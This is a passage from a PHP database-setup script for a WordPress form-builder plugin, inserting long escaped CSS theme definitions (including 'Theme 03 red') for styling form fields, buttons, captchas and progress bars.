.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #C9FD9C !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n\r\n.button-submit {\r\n	background: #3A620A;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #fff;\r\n	border: 2px solid #4A8C08;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 1px 1px #44740E;\r\n	font-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #CDD9C3;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/01/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #000;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\nfont-size: 18px;\r\ncolor: #555;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #42810e;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #36690c;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #62983A; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #61b217), color-stop(39%, #62983a), color-stop(100%, #62983a)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #61b217 0%, #62983a 39%, #62983a 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #61b217 0%, #62983a 39%, #62983a 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height: 18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/01/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`id`, `title`, `css`, `default`) VALUES(10, \'Theme 03 red\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #811919;\r\nmargin-bottom: 10px;\r\ncolor: #811919;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #5D0000 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #942323 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/02/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #811919;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #9E1919;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #811818;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/02/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size: 18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 